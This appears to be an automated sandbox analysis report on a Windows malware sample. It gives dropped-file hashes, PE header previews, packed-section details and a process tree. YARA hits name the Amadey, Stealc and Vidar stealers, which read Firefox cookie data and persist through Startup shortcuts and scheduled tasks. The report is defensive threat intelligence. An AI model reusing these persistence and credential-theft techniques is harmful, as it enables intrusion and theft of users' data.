Preview:	...... WO.+\|`}....D.6.0.n..l&(....mz....3!.d...[..CmK...e.?....1x>I..:MNG).t.......g.4.5^..~....S.-p.b..g..@:.c.%GA}6K........9O.U.L(.\:..!.Y....8....p.se..g..\|.}.....2.W....s....?Qt.N.-O.d(.#..P....#Q.WQ..U............?3~7[........AI...h.\|.2"o..:...}.'T..1........(.8zU.1.m....tfxM..........Gk..1...i....f.eFe.W.+O...Q._ELT...R.h.4....c7.~.....d....V.(%O..b..r.@........m\|...:S. y{..[J..\!.`....%..W' .X.8..^..70.m.4.dy<....=.sG.@I....Y.Z'\.bz.jq..?z..3..6 -z..bha.V.(..^.....&...q{.GYU..#s..}...[.B.r.....[.oH...).48...+.....LB. .4...\..xM..........7.............(....r0J..t....8.P....28.r..=....'+..J n..d2k..Cl....&..J>...8..s...'.st..}..`.y.._.......L...\|p..D....r.i.x..+.Z....Y3?.......l.....r..6xbh..=..S........^.>2....d.=%.X..#....".9.S..tF.c.......Db.....c=he8U..3..1..z}..iD+.}!Q..hE..KiE..@.6...@.#kg3R....b..p.... .?..8..i+.........}.....wP....].og.-.20}N..j=..!.i._m......U.....Z...S6.;.....?,.y...8(.>...b.u........}....

C:\Users\user\AppData\Local\Temp\YJJA1RDG0PY87AD1W2WB98M4U9.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2749952
Entropy (8bit):	6.4515799477032525
Encrypted:	false
SSDEEP:
MD5:	2BC1796E07C6D66C07E2386051C4F951
SHA1:	93D3CD21985B7E3E4DB010FD5AC204881718AD21
SHA-256:	F369E46B9E8D2E340CC2FFF5AE3783C7DC29603686B80FA6A470C7806BC77DA0
SHA-512:	E7FB3F70807BA99183A2BFE98DD83FD2759E747F4BA125A6DC90F146E7E73E9D28ED69E6040F3715099E42227AF8BAA2DAF0FB55C613092BA29B512ADEF469AD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$...........`.. ...`....@.. ..................................`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...skavtqir..).......)..:..............@...kblajhtw. ...@.......).............@....taggant.@...`*.."....).............@...................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-65REB.tmp\_isetup\_iscrypt.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2560
Entropy (8bit):	2.8818118453929262
Encrypted:	false
SSDEEP:
MD5:	A69559718AB506675E907FE49DEB71E9
SHA1:	BC8F404FFDB1960B50C12FF9413C893B56F2E36F
SHA-256:	2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
SHA-512:	E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-65REB.tmp\_isetup\_setup64.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	6144
Entropy (8bit):	4.363359036723334
Encrypted:	false
SSDEEP:
MD5:	526426126AE5D326D0A24706C77D8C5C
SHA1:	68BAEC323767C122F74A269D3AA6D49EB26903DB
SHA-256:	B20A8D88C550981137ED831F2015F5F11517AEB649C29642D9D61DEA5EBC37D1
SHA-512:	A2D824FB08BF0B2B2CC0B5E4AF8B13D5BC752EA0D195C6D40FD72AEC05360A3569EADE1749BDAC81CFB075112D0D3CD030D40F629DAF7ABCC243F9D8DCA8BFBE
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`..............................................................<!.......P.......@..0.................................................................... ...............................text............................... ..`.rdata..\|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc........P......................@..@................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-65REB.tmp\_isetup\_shfoldr.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	23312
Entropy (8bit):	4.596242908851566
Encrypted:	false
SSDEEP:
MD5:	92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:	3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:	9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:	9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......IzJ^..$...$...$...%.".$.T87...$.[."...$...$...$.Rich..$.........................PE..L.....\;...........#..... ...4.......'.......0.....q....................................................................k...l)..<....@.../...................p..T....................................................................................text...{........ .................. ..`.data...\....0.......&..............@....rsrc..../...@...0...(..............@..@.reloc.......p.......X..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\is-EVAOC.tmp\stail.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\10000061101\stail.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	707072
Entropy (8bit):	6.506472836841025
Encrypted:	false
SSDEEP:
MD5:	AA4C6A433329F72AD8B338F73BAB7738
SHA1:	50F3DFF83CA91CEB667DE82F80BE1E15F8DAAE2F
SHA-256:	94C50A23774A7953C7B916C8726FB36143437B0308C57283A1F72EEBF6ED6BAB
SHA-512:	53BCDA0EB56DEF8BB22659C51862AADDA178E2C51C174CD06ED79B270F417A4F3712C186988C36D2643753A50722CA78C54CF44A46377BBB6900135FE6F5FF83
Malicious:	true
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@...............................%..................................................................................................................CODE....@........................... ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................V..............@..P........................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\10000020101\JavUmar.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.002340569197972477
Encrypted:	false
SSDEEP:
MD5:	1D16023FFF9F1456F92C97389A2A4658
SHA1:	2E8870330923BA159E8AF74F5691889BB3C410BA
SHA-256:	328A94DC34F6CA69C1B4AD9FBB79894C2228F8C6326AA022F62724C32F5C6614
SHA-512:	9148366CBFD255A20216E154D9CD46C1602720A340A972D71463C55ED9561E75970BBD3CEC844E2B8ED72F3F656E90928CF129DE6FD6A11441FD822B4BF07069
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;$g...............(.v........................@.......................... ......g.....@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EcoCraft.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.8921782344321025
Encrypted:	false
SSDEEP:
MD5:	C9355C797CB19895982D384DE75D3798
SHA1:	9FD3641F1B921A55A21CF1AA73E53C269EA0AB45
SHA-256:	AD646867827EA2E4ADEBEFDF5D4BFE1A6E37208D373FDF6C4F0B91951FE9F84E
SHA-512:	471B3D93968FE3734DB4A7D232AB0C245CE9BD96F227764095F579BD09CC4ED293EF0DC7EF2783928A414159BB499A1131D039FDA184581FC81399E5CB5DFA72
Malicious:	true
Reputation:	unknown
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js" ..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LgAmARwZ.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000833001\dc753b12e1.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\ProgramData\LgAmARwZ\Application.exe">), ASCII text
Category:	dropped
Size (bytes):	64
Entropy (8bit):	4.835479296672176
Encrypted:	false
SSDEEP:
MD5:	76F433B3FBD6C3D0CA94F50293292ECC
SHA1:	55CECBED8CB353B05CE046AD185488FBCB91BED8
SHA-256:	B04B8AD6F41D55D715FEE227F2C1E4D333627FF2A1B89C0F55E35384028F1B32
SHA-512:	829F24BD3474ABB436D4F685FC6EC8172B1D3AD548CFA71B3CD263B0A3FC353AE4CDD0AB925397FDB07BFA859E79711A6C0B7DBDD95B94B419FEDCE60090BDB6
Malicious:	false
Reputation:	unknown
Preview:	[InternetShortcut].URL="C:\ProgramData\LgAmARwZ\Application.exe"

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Reputation:	unknown
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Tasks\Gxtuum.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.379687348824408
Encrypted:	false
SSDEEP:
MD5:	FD9403DF0302C5AA51A0B864A7DCA7C3
SHA1:	89A63DB043B3393C4758DCB080A44A4B5A8201CC
SHA-256:	8623838A2365B870FBA42854343BE4BE60CC657E7FB0409757AF619CF62458EE
SHA-512:	6BF3ABAB85F7DE5AEBC10ADF218B2F08A3B9DFE4CAAD565CD817240D9A583C2B23450A25D8C1B74FED04BE219021B15CC012E24D9723EC44B0533AA2A82704C0
Malicious:	false
Reputation:	unknown
Preview:	....{.2.mW.H..[...?2F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.2.3.a.0.8.9.2.e.f.8.\.G.x.t.u.u.m...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.420998426367879
Encrypted:	false
SSDEEP:
MD5:	20E8F0CB2B684A396073F93720FF4F35
SHA1:	7D0F686791172DC37C9EE678EA76480B3B2EC289
SHA-256:	1AF9721B9D1B33F6BB458F55710ECA7EA169733B2C67EE1503B2F75E31D834BC
SHA-512:	E1079703385B4BE4B1E6E18F365E87F16DD3E2FEF2D257BCF3C9F9355F434620CEA3A3F24AD13C3A370EFD815A502F587C0821E04F5C5D3309AFA5B1C99A6778
Malicious:	false
Reputation:	unknown
Preview:	......&...WJ.7......F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421606890540731
Encrypted:	false
SSDEEP:
MD5:	90BF62E9DC04BB05EC914743EBFC8839
SHA1:	AFB8DA7B5347C23FBA836DEAE83A72094C1CDB1F
SHA-256:	E44947FEDE7DB95AAFE7885F87F4B6AA673307F091212C2991444087A6C4CB82
SHA-512:	E2D0516A8DA83950FBA9AE1B135A1D9100D5B4A01851D1B9685F77703B98579B063FB70A45473FD305F48B6C2C5030695A92CE568B125D700CC2FB333DAE13D5
Malicious:	false
Reputation:	unknown
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..]J.,................................................................................................................................................................................................................................................................................................................................................J~........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.950763446345506
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'882'624 bytes
MD5:	62a25f901b0883140d09e62daaaaeb23
SHA1:	506b6fdf45a694e8d1638b1145c7605bb100202a
SHA256:	a44c927e4a23da13388d2be3a31ccaed8ead5320d8d6d8cd890f7926e682f8fb
SHA512:	0230d60c4b5fe58230c5f26d904fdbd84f05078180f4d268efd52cfbffda7355f24812cc20c58ee5933b2e2d0cfad9e316a620b9ab05b5c107f0b8602c6eed70
SSDEEP:	49152:jTMXuoYOokO4Fe2aLaGK8k+LB93WK1yLmSf7:jToY8O4xt38Qeyj
TLSH:	2B9533768A620E9AEE8535FBCADF1B1A211407008E07733D7E5D432D4F293E652EF089
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x8ac000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66A240BE [Thu Jul 25 12:10:38 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FA1ECF8721Ah
sets byte ptr [eax+eax]
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007FA1ECF89215h
add byte ptr [ebx], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx+00000080h], dh
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], bl
add byte ptr [eax+000000FEh], ah
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x4d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4aa930	0x10	qmypprrr
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x4aa8e0	0x18	qmypprrr
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x2de00	80966ef0a06f42ead3798e38d190b341	False	0.9973177792915532	data	7.982036434291499	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x4d8	0x400	1e9e326b7c39ae883f1799528b31d259	False	0.58984375	data	4.996507882611394	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x6b000	0x2a6000	0x200	0dfdc4f72275837ccaa48b8ee88bb7e7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qmypprrr	0x311000	0x19a000	0x199e00	f622b700d972eaa2f4035f7adf8b6f3b	False	0.9942371197392498	data	7.953569350952445	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
woialkny	0x4ab000	0x1000	0x400	8f47bb8599e2c4c89615628ecb02ad4e	False	0.7275390625	data	5.7479960174058125	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x4ac000	0x3000	0x2200	429d3fbf38fc0fd6beee71853cf7af13	False	0.08490349264705882	DOS executable (COM)	0.9622965197820071	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x4aa940	0x2e6	XML 1.0 document, ASCII text, with CRLF line terminators			0.45417789757412397
RT_MANIFEST	0x4aac26	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	00:02:03
Start date:	02/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x740000
File size:	1'882'624 bytes
MD5 hash:	62A25F901B0883140D09E62DAAAAEB23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2056584594.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2096834409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	00:02:06
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x9d0000
File size:	1'882'624 bytes
MD5 hash:	62A25F901B0883140D09E62DAAAAEB23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2121371600.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2080542129.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	00:02:06
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x9d0000
File size:	1'882'624 bytes
MD5 hash:	62A25F901B0883140D09E62DAAAAEB23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2126506859.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2086147966.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	00:03:00
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x9d0000
File size:	1'882'624 bytes
MD5 hash:	62A25F901B0883140D09E62DAAAAEB23
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2617632587.0000000005080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	00:03:07
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"
Imagebase:	0x690000
File size:	314'368 bytes
MD5 hash:	68A99CF42959DC6406AF26E91D39F523
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000007.00000000.2682479773.00000000006AE000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000007.00000002.3110980719.00000000006AE000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000007.00000000.2682444878.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000007.00000002.3110915823.0000000000691000.00000080.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	00:03:13
Start date:	02/11/2024
Path:	C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"
Imagebase:	0x7e0000
File size:	439'296 bytes
MD5 hash:	C07E06E76DE584BCDDD59073A4161DBB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	00:03:14
Start date:	02/11/2024
